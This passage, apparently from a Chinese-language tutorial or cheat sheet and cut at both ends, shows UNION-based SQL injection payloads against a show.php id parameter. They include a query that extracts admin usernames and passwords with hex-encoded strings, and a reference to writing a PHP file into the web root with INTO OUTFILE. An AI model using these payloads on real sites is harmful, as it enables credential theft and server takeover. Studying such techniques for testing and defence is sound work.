news WHERE id=1 • show.php?id=1 union select 1,2,3 – SELECT * FROM news WHERE id=1 union select 1,2,3 • show.php?id=-1 union select 1,2,3 – SELECT * FROM news WHERE id=-1 union select 1,2,3
等價於 ( SELECT 0x666f6f ) – show.php?id=-1 union select username,password,3 from admin where username like 0x2561646d25 • into outfile '/var/www/.a.php' 就不能這樣搞了 – 不能寫檔怎麼辦?